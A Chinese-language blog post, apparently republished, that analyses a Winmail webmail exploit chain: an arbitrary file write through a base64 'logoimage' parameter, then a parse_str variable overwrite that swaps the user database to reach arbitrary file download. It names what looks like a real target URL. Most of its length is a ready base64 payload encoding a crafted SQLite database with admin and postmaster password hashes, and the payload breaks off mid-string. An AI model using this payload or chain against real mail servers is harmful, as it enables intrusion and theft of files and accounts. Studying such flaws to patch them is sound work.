winmail getshell源码分析(任意文件下载)

Posted

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了winmail getshell源码分析(任意文件下载)相关的知识,希望对你有一定的参考价值。

http://www.tuicool.com/articles/BFZ7Rze 根据此链接分析

winmail中全局变量全部在./inc/config.php中定义。如果出现变量覆盖漏洞则可以覆盖任意全局变量。

根据作者思路先看wap.php这个文件。

switch ($dest){
case ‘index‘: include(‘../wap/index.php‘); break;

当wap.php?dest=index时调用index.php文件

观察index.php(位于../wap/index.php)

$logofile = ‘‘; //可忽略
if ($logoimage != ‘‘) { //文件
	if (strncasecmp($logoimage, ‘jpg:‘, 4) == 0 || strncasecmp($logoimage, ‘gif:‘, 4) == 0 
		|| strncasecmp($logoimage, ‘png:‘, 4) == 0) { //判断文件后缀,取前三位作为后缀,与其他比较
		$arrImage = explode(‘:‘, $logoimage); //将logoimage分为一个数组存到$arrImage
		if (count($arrImage) == 3) { //如果arrimage有3个值
			
			$logofile = $customizepath.$f_domain.‘_logo.‘.$arrImage[0]; //要保存的文件位置  把$arrimage[0]作为后缀, $f_domain是文件名一部分 $customizepath是文件路径(从全局取得)
			if (!file_exists($logofile) || filemtime($logofile) <= floatval($arrImage[1])) { //如果文件不存在 则写入文件
				$fullfile = $webmailhome_directory.$logofile;
				file_put_contents($fullfile, base64_decode($arrImage[2]));
			}
	    }
	}
}

  在这段代码中,可控变量有$logoimage $f_domain 控制$logoimage可控制文件后缀和文件内容,$f_domain可控制文件名

由此一个写入特定后缀文件的漏洞形成。但只局限于jpg gif png等。并不能得到权限。

 

在viewsharenetdisk.php中

if (isset($f)) {
 
  $f = str_replace(‘ ‘, ‘+‘, $f);
 
  $f = base64_decode($f);
 
 
  parse_str($f);
 
}

  parse_str存在变量覆盖漏洞。$f可被覆盖。 需要base64加密,之后的变量在没有重新赋值时便可任意控制

 

	if ($chksun != ‘‘ || $filename != ‘‘) {
		$item = ($chksum != ‘‘) ? $chksum : str_replace(‘ ‘, ‘+‘, $filename);
echo ‘aaa‘.md5($item.‘|‘.$userinfo[‘userid‘].‘|‘.$userinfo[‘createtime‘]).‘aaa‘;           //判断itemcode是否相等

		if ($itemcode != md5($item.‘|‘.$userinfo[‘userid‘].‘|‘.$userinfo[‘createtime‘])) {
			$smarty->assign(‘errCode‘, 1);
			$smarty->display($selected_theme.‘/netdisk-viewshare.htm‘);
			exit;
		}
	}
}
...
...
if ($chksum != ‘‘) {
echo ‘$chksum:‘.md5($userid.‘|‘.$filename.‘|‘.$start).‘$chksum:‘;

	if ($chksum != md5($userid.‘|‘.$filename.‘|‘.$start)) {   //判断chksum是否相等


		$smarty->assign(‘errCode‘, 2);
		$smarty->display($selected_theme.‘/netdisk-viewshare.htm‘);
		exit;
	}

  按照流程走下来。需要验证$chknum和$itemcode。 这两个变量可以覆盖,但是不知道userinfo的md5值。

网上看userinfo由

$domaininfo = load_domaininfo($domain);
$userinfo = load_userinfo($userid);

获得。

而sql中有new sqlite带入一个变量

inc/class.sqlitedb.php

function __construct($file) {
            $this->dbfile = $file;
            
            $this->Open();
        }

 

inc/lib.php


function load_userinfo($name, $domain = null) {
    if (is_null($domain)) {
        $pos = strpos($name, ‘@‘);
        if ($pos !== false) {
            $domain = substr($name, $pos+1);
            $name = substr($name, 0, $pos);
        }
        else {
            $domain = ‘‘;
        }
    }
    
    global $mailuser_dbfile;    
    echo $mailuser_dbfile;
    $db = new SqliteDB($mailuser_dbfile);

这里的$file 由mailuser_dbfile传入。 mailuser_dbfile是在全局中定义的,此时可覆盖。

 

于是我们可以通过任意文件写入一个数据库,利用覆盖mailuser_dbfile得到一个新的数据库,此时数据库中的userindo便可控制。 据此可以达到任意文件下载的目的。
http://mail.jida.com.cn/wap.php?dest=index


logoimage=jpg:1.jpg:U1FMaXRlIGZvcm1hdCAzAAQAAQEAQCAgAAAXtgAAAAwAAAAIAAAAAwAAAHYAAAAEAAAAAAAAAAAAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABe2AC3mCAUAAAABA/sAAAAABwP7A/YAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAARQAgYXKysBWXRhYmxlc3FsaXRlX3NlcXVlbmNlc3FsaXRlX3NlcXVlbmNlBENSRUFURSBUQUJMRSBzcWxpdGVfc2VxdWVuY2UobmFtZSxzZXEpjXABBxcdHQGbM3RhYmxlbWFpbHVzZXJtYWlsdXNlcgJDUkVBVEUgVEFCTEUgW21haWx1c2VyXSAoDQpbdXNlcmlkXSBJTlRFR0VSICBQUklNQVJZIEtFWSBBVVRPSU5DUkVNRU5UIE5VTEwsDQpbbmFtZV0gVkFSQ0hBUig2NCkgIE5PVCBOVUxMLA0KW2RvbWFpbl0gVkFSQ0hBUig2NCkgIE5VTEwsDQpbcGFzc3dvcmRdIFZBUkNIQVIoNjQpICBOVUxMLA0KW2F1dGh0eXBlXSBUSU5ZSU5UICBOVUxMLA0KW3N0YXR1c10gVElOWUlOVCAgTlVMTCwNCltmdWxsbmFtZV0gVkFSQ0hBUigxMjgpICBOVUxMLA0KW2Rlc2NyaXB0aW9uXSBURVhUICBOVUxMLA0KW3B3ZHF1ZXN0aW9uXSBWQVJDSEFSKDI1NikgIE5VTEwsDQpbcHdkYW5zd2VyXSBWQVJDSEFSKDEyOCkgIE5VTEwsDQpbcHVibGljaW5mb10gVElOWUlOVCAgTlVMTCwNCltob21lYWRkcmVzc10gVkFSQ0hBUigyNTYpICBOVUxMLA0KW2hvbWVwaG9uZV0gVkFSQ0hBUigzMikgIE5VTEwsDQpbbW9iaWxlXSBWQVJDSEFSKDMyKSAgTlVMTCwNCltjb21wYW55XSBWQVJDSEFSKDEyOCkgIE5VTEwsDQpbam9idGl0bGVdIFZBUkNIQVIoMTI4KSAgTlVMTCwNCltvZmZpY2VdIFZBUkNIQVIoMTI4KSAgTlVMTCwNCltvZmZpY2VwaG9uZV0gVkFSQ0hBUigzMikgIE5VTEwsDQpbbWFpbHF1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c3RhdHVzXSBUSU5ZSU5ULCANCiAgW2Z1bGxuYW1lXSBWQVJDSEFSKDEyOCksIA0KICBbZGVzY3JpcHRpb25dIFRFWFQsIA0KICBbcHdkcXVlc3Rpb25dIFZBUkNIQVIoMjU2KSwgDQogIFtwd2RhbnN3ZXJdIFZBUkNIQVIoMTI4KSwgDQogIFtwdWJsaWNpbmZvXSBUSU5ZSU5ULCANCiAgW2hvbWVhZGRyZXNzXSBWQVJDSEFSKDI1NiksIA0KICBbaG9tZXBob25lXSBWQVJDSEFSKDMyKSwgDQogIFttb2JpbGVdIFZBUkNIQVIoMzIpLCANCiAgW2NvbXBhbnldIFZBUkNIQVIoMTI4KSwgDQogIFtqb2J0aXRsZV0gVkFSQ0hBUigxMjgpLCANCiAgW29mZmljZV0gVkFSQ0hBUigxMjgpLCANCiAgW29mZmljZXBob25lXSBWQVJDSEFSKDMyKSwgDQogIFttYWlscXVvdGFdIEJJR0lOVCwgDQogIFttYWlsY291bnRdIElOVCwgDQogIFtmdHBxdW90YV0gQklHSU5ULCANCiAgW2Z0cGNvdW50XSBJTlQsIA0KICBbd2FybmluZ2xpbWl0XSBUSU5ZSU5ULCANCiAgW3VzZWRtYWlscXVvdGFdIEJJR0lOVCwgDQogIFt1c2VkbWFpbGNvdW50XSBJTlQsIA0KICBbdXNlZGZ0cHF1b3RhXSBCSUdJTlQsIA0KICBbdXNlZGZ0cGNvdW50XSBJTlQsIA0KICBbbWFpbHN0b3JlcGF0aF0gVkFSQ0hBUigyNTYpLCANCiAgW2Z0cHN0b3JlcGF0aF0gVkFSQ0hBUigyNTYpLCANCiAgW3NlbmRjbwAAAAxQAgYXKysBWXRhYmxlc3FsaXRlX3NlcXVlbmNlc3FsaXRlX3NlcXVlbmNlBENSRUFURSBUQUJMRSBzcWxpdGVfc2VxdWVuY2UobmFtZSxzZXEpDQKtAAMBAQADmQEBAkICugAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACBbQMHFx8fAYMpdGFibGV1c2VyYWxpYXN1c2VyYWxpYXMFQ1JFQVRFIFRBQkxFIFt1c2VyYWxpYXNdICgNClt1c2VyaWRdIElOVEVHRVIgIFBSSU1BUlkgS0VZIEFVVE9JTkNSRU1FTlQgTlVMTCwNCltuYW1lXSBWQVJDSEFSKDY0KSAgTk9UIE5VTEwsDQpbZG9tYWluXSBWQVJDSEFSKDY0KSAgTlVMTCwNCltyZWFsdXNlcl2CPggHFx8fAYRLdGFibGV1c2VyYWxpYXN1c2VyYWxpYXMCQ1JFQVRFIFRBQkxFIFt1c2VyYWxpYXNdICgNCiAgW3VzZXJpZF0gSU5URUdFUiBQUklNQVJZIEtFWSBBVVRPSU5DUkVNRU5ULCANCiAgW25hbWVdIFZBUkNIQVIoNjQpIE5PVCBOVUxMLCANCiAgW2RvbWFpbl0gVkFSQ0hBUig2NCkgTk9UIE5VTEwsIA0KICBbcmVhbHVzZXJdIFZBUkNIQVIoMTI4KSwgDQogIFtkZXNjcmlwdGlvbl0gVkFSQ0hBUigyNTYpLCBbbWFpbGhvc3RdIFZBUkNIQVIoMTI4KSBOVUxMLCBbc3luY2FjdGlvbl0gVkFSQ0hBUigzMikgTlVMTCwgW3N5bmN0aW1lXSBCSUdJTlQgTlVMTClpCQcXJx8BgRlpbmRleGlueF9hbGlhc21haWx1c2VyYWxpYXMFQ1JFQVRFIElOREVYIFtpbnhfYWxpYXNtYWlsXSBPTiBbdXNlcmFsaWFzXSAoW25hbWVdIEFTQywgW2RvbWFpbl0gQVNDKQAAAOwXHx8BgyF0YWJsZXVzZXJhbGlhc3VzZXJhbGlhcwJDUkVBVEUgVEFCTEUgW3VzZXJhbGlhc10gKA0KICBbdXNlcmlkXSBJTlRFR0VSIFBSSU1BUlkgS0VZIEFVVE9JTkNSRU1FTlQsIA0KICBbbmFtZV0gVkFSQ0hBUig2NCkgTk9UIE5VTEwsIA0KICBbZG9tYWluXSBWQVJDSEFSKDY0KSBOT1QgTlVMTCwgDQogIFtyZWFsdXNlcl0gVkFSQ0hBUigxMjgpLCANCiAgW2Rlc2NyaXB0aW9uXSBWQVJDSEFSKDI1NikpZQcHFyUdAYEVaW5kZXhpbnhfdXNlcm1haWxtYWlsdXNlcgtDUkVBVEUgSU5ERVggW2lueF91c2VybWFpbF0gT04gW21haWx1c2VyXSAoW25hbWVdIEFTQywgW2RvbWFpbl0gQVNDKQAAAAAAAAACAAAACQAAAAoAAAAJAAAABUJJR0lOVCAgTlVMTCwNClt1c2VkbWFpbGNvdW50XSBJTlQgIE5VTEwsDQpbdXNlZGZ0cHF1b3RhXSBCSUdJTlQgIE5VTEwsDQpbdXNlZGZ0cGNvdW50XSBJTlQgIE5VTEwsDQpbbWFpbHN0b3JlcGF0aF0gVkFSQ0hBUigyNTYpICBOVUxMLA0KW2Z0cHN0b3JlcGF0aF0gVkFSQ0hBUigyNTYpICBOVUxMLA0KW3NlbmRjb250cm9sXSBUSU5ZSU5UICBOVUxMLA0KW3NlbmRkb21haW5saXN0XSBURVhUICBOVUxMLA0KW3JlY3Zjb250cm9sXSBUSU5ZSU5UICBOVUxMLA0KW3JlY3Zkb21haW5saXN0XSBURVhUICBOVUxMLA0KW3JpZ2h0c10gVkFSQ0hBUig2NCkgIE5VTEwsDQpbbWF4bXNnc2l6ZV0gSU5UICBOVUxMLA0KW3NlbmRmcmVxXSBJTlQgIE5VTEwsDQpbbG9jYWx0aW1lc10gSU5UICBOVUxMLA0KW2xvY2Fsc2l6ZV0gQklHSU5UICBOVUxMLA0KW3JlbW90ZXRpbWVzXSBJTlQgIE5VTEwsDQpbcmVtb3Rlc2l6ZV0gQklHSU5UICBOVUxMLA0KW3NtdHBhY2xdIFRFWFQgIE5VTEwsDQpbcG9wM2FjbF0gVEVYVCAgTlVMTCwNCltpbWFwYWNsXSBURVhUICBOVUxMLA0KW3dlYm1haWxhY2xdIFRFWFQgIE5VTEwsDQpbZnRwYWNsXSBURVhUICBOVUxMLA0KW2NoZ3Bhc3N3b3JkXSBUSU5ZSU5UICBOVUxMLA0KW2xhc3RjaGdwd2R0aW1lXSBCSUdJTlQgIE5VTEwsDQpbcHdkZXhwaXJlZGF5c10gSU5UICBOVUxMLA0KW2F1dG9yZXBseXN0YXR1c10gVElOWUlOVCAgTlVMTCwNCltmb3J3YXJkYWRkcl0gVEVYVCAgTlVMTCwNCltmd2RzYXZlY29weV0gVElOWUlOVCAgTlVMTCwNClttYWlsbm90aWZ5XSBUSU5ZSU5UICBOVUxMLA0KW3NwYW1hc3Nhc3Npbl0gVElOWUlOVCAgTlVMTCwNCltzcGFtZGVhbGluZ10gVElOWUlOVCAgTlVMTCwNCltleHBpcmV0aW1lXSBCSUdJTlQgIE5VTEwsDQpbY3JlYXRldGltZV0gQklHSU5UICBOVUxMLA0KW2xhc3R2aXNpdHRpbWVdIEJJR0lOVCAgTlVMTCwNCltwYXVzZXRpbWVdIEJJR0lOVCAgTlVMTCwNClttYXhyY3B0XSBJTlQgIE5VTEwNCikAAAAAQ0hBUigyNTYpLCANCiAgW2Z0cHN0b3JlcGF0aF0gVkFSQ0hBUigyNTYpLCANCiAgW3NlbmRjb250cm9sXSBUSU5ZSU5ULCANCiAgW3NlbmRkb21haW5saXN0XSBURVhULCANCiAgW3JlY3Zjb250cm9sXSBUSU5ZSU5ULCANCiAgW3JlY3Zkb21haW5saXN0XSBURVhULCANCiAgW3JpZ2h0c10gVkFSQ0hBUig2NCksIA0KICBbbWF4bXNnc2l6ZV0gSU5ULCANCiAgW3NlbmRmcmVxXSBJTlQsIA0KICBbbG9jYWx0aW1lc10gSU5ULCANCiAgW2xvY2Fsc2l6ZV0gQklHSU5ULCANCiAgW3JlbW90ZXRpbWVzXSBJTlQsIA0KICBbcmVtb3Rlc2l6ZV0gQklHSU5ULCANCiAgW3NtdHBhY2xdIFRFWFQsIA0KICBbcG9wM2FjbF0gVEVYVCwgDQogIFtpbWFwYWNsXSBURVhULCANCiAgW3dlYm1haWxhY2xdIFRFWFQsIA0KICBbZnRwYWNsXSBURVhULCANCiAgW2NoZ3Bhc3N3b3JkXSBUSU5ZSU5ULCANCiAgW2xhc3RjaGdwd2R0aW1lXSBCSUdJTlQsIA0KICBbcHdkZXhwaXJlZGF5c10gSU5ULCANCiAgW2F1dG9yZXBseXN0YXR1c10gVElOWUlOVCwgDQogIFtmb3J3YXJkYWRkcl0gVEVYVCwgDQogIFtmd2RzYXZlY29weV0gVElOWUlOVCwgDQogIFttYWlsbm90aWZ5XSBUSU5ZSU5ULCANCiAgW3NwYW1hc3Nhc3Npbl0gVElOWUlOVCwgDQogIFtzcGFtZGVhbGluZ10gVElOWUlOVCwgDQogIFtleHBpcmV0aW1lXSBCSUdJTlQsIA0KICBbY3JlYXRldGltZV0gQklHSU5ULCANCiAgW2xhc3R2aXNpdHRpbWVdIEJJR0lOVCwgDQogIFtwYXVzZXRpbWVdIEJJR0lOVCwgDQogIFttYXhyY3B0XSBJTlQsIFthdXRvYXJjaGl2ZV0gVkFSQ0hBUigxMjgpIE5VTEwsIFthdXRvY2xlYW51cF0gVkFSQ0hBUigxMjgpIE5VTEwsIFtzZWNyZXRsZXZlbF0gSU5UIE5VTEwsIFt3ZWl4aW5dIFZBUkNIQVIoMjU2KSBOVUxMLCBbZGluZ10gVkFSQ0hBUigyNTYpIE5VTEwsIFtvbGRwYXNzd29yZF0gVkFSQ0hBUigxMjgpIE5VTEwsIFttYWlsaG9zdF0gVkFSQ0hBUigxMjgpIE5VTEwsIFtvbGRtYWlsaG9zdF0gVkFSQ0hBUigxMjgpIE5VTEwpAAAAAEFSQ0hBUigyNTYpLCANCiAgW3NlbmRjb250cm9sXSBUSU5ZSU5ULCANCiAgW3NlbmRkb21haW5saXN0XSBURVhULCANCiAgW3JlY3Zjb250cm9sXSBUSU5ZSU5ULCANCiAgW3JlY3Zkb21haW5saXN0XSBURVhULCANCiAgW3JpZ2h0c10gVkFSQ0hBUig2NCksIA0KICBbbWF4bXNnc2l6ZV0gSU5ULCANCiAgW3NlbmRmcmVxXSBJTlQsIA0KICBbbG9jYWx0aW1lc10gSU5ULCANCiAgW2xvY2Fsc2l6ZV0gQklHSU5ULCANCiAgW3JlbW90ZXRpbWVzXSBJTlQsIA0KICBbcmVtb3Rlc2l6ZV0gQklHSU5ULCANCiAgW3NtdHBhY2xdIFRFWFQsIA0KICBbcG9wM2FjbF0gVEVYVCwgDQogIFtpbWFwYWNsXSBURVhULCANCiAgW3dlYm1haWxhY2xdIFRFWFQsIA0KICBbZnRwYWNsXSBURVhULCANCiAgW2NoZ3Bhc3N3b3JkXSBUSU5ZSU5ULCANCiAgW2xhc3RjaGdwd2R0aW1lXSBCSUdJTlQsIA0KICBbcHdkZXhwaXJlZGF5c10gSU5ULCANCiAgW2F1dG9yZXBseXN0YXR1c10gVElOWUlOVCwgDQogIFtmb3J3YXJkYWRkcl0gVEVYVCwgDQogIFtmd2RzYXZlY29weV0gVElOWUlOVCwgDQogIFttYWlsbm90aWZ5XSBUSU5ZSU5ULCANCiAgW3NwYW1hc3Nhc3Npbl0gVElOWUlOVCwgDQogIFtzcGFtZGVhbGluZ10gVElOWUlOVCwgDQogIFtleHBpcmV0aW1lXSBCSUdJTlQsIA0KICBbY3JlYXRldGltZV0gQklHSU5ULCANCiAgW2xhc3R2aXNpdHRpbWVdIEJJR0lOVCwgDQogIFtwYXVzZXRpbWVdIEJJR0lOVCwgDQogIFttYXhyY3B0XSBJTlQsIFthdXRvYXJjaGl2ZV0gVkFSQ0hBUigxMjgpIE5VTEwsIFthdXRvY2xlYW51cF0gVkFSQ0hBUigxMjgpIE5VTEwsIFtzZWNyZXRsZXZlbF0gSU5UIE5VTEwsIFt3ZWl4aW5dIFZBUkNIQVIoMjU2KSBOVUxMLCBbZGluZ10gVkFSQ